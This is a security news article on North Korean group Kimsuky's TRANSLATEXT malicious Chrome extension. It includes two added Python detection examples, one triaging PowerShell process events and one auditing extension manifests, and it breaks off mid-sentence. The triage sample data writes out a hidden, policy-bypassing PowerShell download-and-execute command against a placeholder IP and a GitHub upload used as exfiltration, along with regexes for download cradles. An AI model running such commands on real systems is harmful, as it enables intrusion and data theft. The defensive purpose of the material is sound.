CHROME TRANSFORMS INTO ESPIONAGE TOOL

The North Korean threat group Kimsuky has been observed using a new malicious Google Chrome extension, tracked as TRANSLATEXT, to steal sensitive information. The activity was first observed in early March 2024.

TRANSLATEXT can harvest email addresses, usernames, passwords and cookies, and capture browser screenshots. The primary targets were members of South Korea's academic community who work on North Korean political affairs.

Kimsuky, active since 2012, is known for cyber-espionage and financially motivated attacks against organisations in South Korea. It is tied to North Korea's Reconnaissance General Bureau (RGB) and has close links with another well-known group operating on behalf of the DPRK, Lazarus. Kimsuky is also tracked as APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet, Springtail and Velvet Chollima.

In recent weeks, Kimsuky has also been exploiting a long-patched Microsoft Office Equation Editor vulnerability (CVE-2017-11882) in phishing emails that use aerospace and defence job lures as part of its espionage activity.

Cyfirma reported at the end of June that Kimsuky has developed a new backdoor, Niki, which performs basic reconnaissance and loads additional payloads to give the operators remote control over infected machines.

The exact initial access method used in this campaign has not yet been determined, but the group is known to rely on phishing and social engineering to start the infection chain. Typically the attack begins with a ZIP archive purporting to relate to the Korean military, containing a decoy document and an executable file.

Opening the executable runs a PowerShell script fetched from the attackers' server, which sends information about the victim to a GitHub repository and downloads additional PowerShell code by way of a Windows shortcut (LNK) file.
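The chain above (an executable run from an extracted archive that spawns PowerShell, which pulls a script from a remote host and talks to GitHub) is the kind of sequence that process-creation telemetry can catch. The following Python triage is an added example written for this page, not detection logic from Zscaler or from the report; the regex heuristics, the two-indicator threshold and the Sysmon-style sample records (with made-up paths, a documentation-range IP and a placeholder repository) are all this example's own assumptions.

```python
import re

# Heuristic patterns for the chain described in the article. They are this
# example's assumptions, not published detection content from the report.
CRADLE_RE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient"
    r"|\bIEX\b|Invoke-Expression", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden|-e(?:xecutionpolicy|p)\s+bypass", re.I)
TEMP_EXE_RE = re.compile(r"\\Temp\\.*\.exe$", re.I)      # parent .exe launched from a Temp path
GITHUB_RE = re.compile(r"github\.com|githubusercontent\.com", re.I)
POWERSHELL_IMAGES = ("powershell.exe", "pwsh.exe")


def analyze(event):
    """Return the list of heuristic findings for one process-creation record."""
    findings = []
    if not event["image"].lower().endswith(POWERSHELL_IMAGES):
        return findings                                 # only PowerShell children matter here
    cmd = event["command_line"]
    if TEMP_EXE_RE.search(event["parent_image"]):
        findings.append("powershell_from_temp_exe")     # e.g. an .exe extracted from a ZIP lure
    if CRADLE_RE.search(cmd):
        findings.append("download_cradle")              # fetches and/or executes remote code
    if HIDDEN_RE.search(cmd):
        findings.append("hidden_or_bypass")             # hidden window / execution-policy bypass
    if GITHUB_RE.search(cmd):
        findings.append("github_in_cmdline")            # GitHub used as drop or exfil point
    return findings


def triage(events):
    """(index, findings) for events with a download cradle plus at least one more indicator."""
    hits = []
    for idx, ev in enumerate(events):
        f = analyze(ev)
        if "download_cradle" in f and len(f) >= 2:
            hits.append((idx, f))
    return hits


# Constructed sample records in a Sysmon event 1 shape. Paths, the host
# 203.0.113.10 and the repository name are invented for this example.
SAMPLE_EVENTS = [
    {   # executable from an extracted archive spawning a hidden download cradle
        "parent_image": r"C:\Users\kim\AppData\Local\Temp\Temp1_military_report.zip\report.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell.exe -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
                        ".DownloadString('http://203.0.113.10/s.ps1')\"",
    },
    {   # second stage pushing data to a GitHub repository
        "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell.exe -nop -c \"Invoke-WebRequest -Uri "
                        "https://api.github.com/repos/example/repo/contents/x -Method PUT\"",
    },
    {   # benign scheduled script launched from the desktop shell
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell.exe -NoProfile -File C:\\Scripts\\backup.ps1",
    },
]

if __name__ == "__main__":
    for idx, findings in triage(SAMPLE_EVENTS):
        print(idx, findings, SAMPLE_EVENTS[idx]["command_line"][:70])
```

Requiring a download cradle plus one further indicator keeps an ordinary `-File` admin script out of the results while still surfacing both the initial cradle and the GitHub stage; in production the parent-path and GitHub checks would be tuned to the environment's own software distribution habits.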

Zscaler found that the GitHub account was created on February 13, 2024 and briefly hosted the TRANSLATEXT extension under the file name GoogleTranslate.crx. The attackers removed the files the following day, which suggests Kimsuky intended to limit exposure and use the malicious extension only against specific targets.

TRANSLATEXT, disguised as Google Translate, contains JavaScript that steals data and bypasses security measures of services such as Google, Kakao and Naver. It can also fetch commands from a Blogger Blogspot URL in order to take screenshots of newly opened tabs and delete all of the browser's cookies. Because it was delivered as a sideloaded .crx file rather than through the Chrome Web Store, the extension's name and icon offer no assurance of its origin; its manifest permissions are the more reliable indicator of what it can do.
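Reading cookies, capturing tabs and harvesting credentials from pages all require specific Chrome extension permissions combined with broad host access, so a manifest audit is a practical first check on any extension of unknown origin. The Python below is an added example for this page, not code from Zscaler and not TRANSLATEXT's real manifest, which the article does not reproduce; the permission descriptions, the risk rule and both sample manifests are this example's own assumptions.

```python
import json

# Permissions that, together with broad host access, enable the capabilities
# attributed to TRANSLATEXT. Descriptions are this example's own summary of the
# Chrome extension API surface.
RISKY_PERMISSIONS = {
    "cookies": "read or delete cookies for any site it has host access to",
    "tabs": "enumerate tabs and capture the visible tab where it has host access",
    "webRequest": "observe requests, including form posts carrying credentials",
    "scripting": "inject arbitrary scripts into pages it has host access to",
}
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}


def _host_patterns(manifest):
    """Host patterns from MV3 host_permissions, MV2 permissions and content_scripts."""
    patterns = set(manifest.get("host_permissions", []))
    patterns.update(p for p in manifest.get("permissions", [])
                    if "://" in p or p == "<all_urls>")
    for cs in manifest.get("content_scripts", []):
        patterns.update(cs.get("matches", []))
    return patterns


def audit_manifest(manifest):
    """Score one parsed manifest.json: name, human-readable findings, high-risk verdict."""
    findings = []
    perms = set(manifest.get("permissions", []))
    for p in sorted(perms & set(RISKY_PERMISSIONS)):
        findings.append(f"permission {p}: {RISKY_PERMISSIONS[p]}")
    broad_hosts = _host_patterns(manifest) & BROAD_HOSTS
    if broad_hosts:
        findings.append("broad host access: " + ", ".join(sorted(broad_hosts)))
    name = manifest.get("name", "")
    # A familiar name proves nothing either way; it only raises the priority of
    # checking where the extension came from (store listing vs. sideloaded .crx).
    if "translate" in name.lower():
        findings.append(f"name '{name}' mimics a translation tool; verify its origin")
    # High risk: can reach every site AND read cookies/tabs/requests or inject code.
    high_risk = bool(broad_hosts) and bool(perms & set(RISKY_PERMISSIONS))
    return {"name": name, "findings": findings, "high_risk": high_risk}


def audit_manifest_file(path):
    """Load manifest.json from an unpacked extension directory and audit it."""
    with open(path, encoding="utf-8") as fh:
        return audit_manifest(json.load(fh))


# Constructed manifests for this example; neither is the real TRANSLATEXT manifest.
SUSPICIOUS_MANIFEST = {
    "manifest_version": 3, "name": "Google Translate", "version": "1.0",
    "permissions": ["cookies", "tabs", "storage", "scripting"],
    "host_permissions": ["<all_urls>"],
    "content_scripts": [{"matches": ["<all_urls>"], "js": ["content.js"]}],
    "background": {"service_worker": "bg.js"},
}
BENIGN_MANIFEST = {
    "manifest_version": 3, "name": "Word Counter", "version": "0.1",
    "permissions": ["activeTab"], "action": {},
}

if __name__ == "__main__":
    for m in (SUSPICIOUS_MANIFEST, BENIGN_MANIFEST):
        print(json.dumps(audit_manifest(m), indent=2))
```

On Windows, installed extensions live under %LOCALAPPDATA%\Google\Chrome\User Data\Default\Extensions\<id>\<version>\manifest.json, so `audit_manifest_file` can be pointed at each of those directories; a "high_risk" result is a prompt for checking the install source and the extension's scripts, not proof of malice on its own, since legitimate password managers and ad blockers request similar permissions.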

The ultimate aim of the Kimsuk
